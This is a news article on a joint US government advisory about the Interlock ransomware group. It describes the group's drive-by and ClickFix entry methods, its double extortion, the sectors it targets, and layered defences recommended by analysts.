The FBI, CISA, Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint cybersecurity advisory warning of an emerging ransomware threat from Interlock, a group that uses double extortion tactics to target businesses and critical infrastructure organizations across the US.
The Interlock ransomware variant was first identified in September 2024. Its encryptors are designed for Windows and Linux operating systems. As per the advisory, the observed cases of attackers encrypt virtual machines (VMs) across both platforms.
Interlock uses uncommon entry points
Unlike many ransomware operations that rely on phishing or exposed remote desktop protocol (RDP), FBI investigations noted that Interlock actors deploy a relatively rare technique by exploiting drive-by downloads from compromised legitimate websites.
They have also employed ClickFix, a social engineering method that tricks victims into running a malicious payload under the pretense of resolving a system issue. Once inside, the actors then deploy various methods for discovery, credential access, and lateral movement to spread to other systems on the network.
Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, increasing pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked, the advisory stated. Moreover, ransom demand or payment instructions are not included in the ransom notes. Instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser, noted the advisory.
“What makes Interlock uniquely dangerous is not the technical novelty of its encryption payload, but its orchestration of psychological and procedural blind spots across the enterprise. This group has weaponised familiarity by using trusted UI elements like the Windows Explorer address bar to execute remote access trojans with minimal user suspicion,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research. “They exploit patch cycles, user habits, and the assumed sanctity of digital hygiene. By embedding across multiple vectors, such as social, technical, and procedural, Interlock increases recovery cost not just in infrastructure, but in trust and governance posture. Its pivot from fake CAPTCHA prompts to deceptive ‘fix’ messages reflects an agile, feedback-driven threat actor able to learn and adapt faster than most enterprise defence protocols can cycle.”
Target sectors and global reach
The advisory did not disclose the names of targeted organizations, but noted that critical infrastructure and other organizations in North America and Europe have been targeted in the past.
“Healthcare has been a primary target, with incidents involving DaVita and Kettering Health. Education, technology, manufacturing, and government have also been hit,” said Amit Jaju, senior managing director at Ankura Consulting. “Going forward, critical infrastructure, particularly energy and transportation, as well as financial services, are vulnerable due to virtualization dependencies.”
Layered defenses are critical to mitigation
While Interlock actors have been attacking and encrypting virtual machines till now, hosts, workstations, and physical servers can be targeted in the future. To mitigate these risks, robust endpoint detection and response (EDR) capabilities should be deployed, alongside broader security hardening efforts.
Key steps include implementing DNS filtering, web access firewalls, and user training to detect social engineering attempts such as ClickFix. Organizations should also patch known vulnerabilities across operating systems, firmware, and applications, and segment networks to contain lateral movement after initial compromise.
Security teams are also advised to enforce strong identity, credential, and access management (ICAM) policies, including multi-factor authentication (MFA) across all services where feasible.
“To strengthen defenses against threats like Interlock, enterprises should go beyond standard advisories by adopting layered strategies. This includes implementing clipboard and UI controls to block or prompt paste actions into Explorer or Run, and enforcing Group Policy or endpoint restrictions on suspicious behaviors,” said Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. “Organizations should also restrict user execution rights by limiting access to system dialogs and script execution. Additionally, DNS and web filtering should be enhanced beyond basic blocking to include content analysis and detection of script-based copy/paste attacks delivered via compromised websites.”
Enterprises should also keep offline, immutable backups to avoid ransom dependence.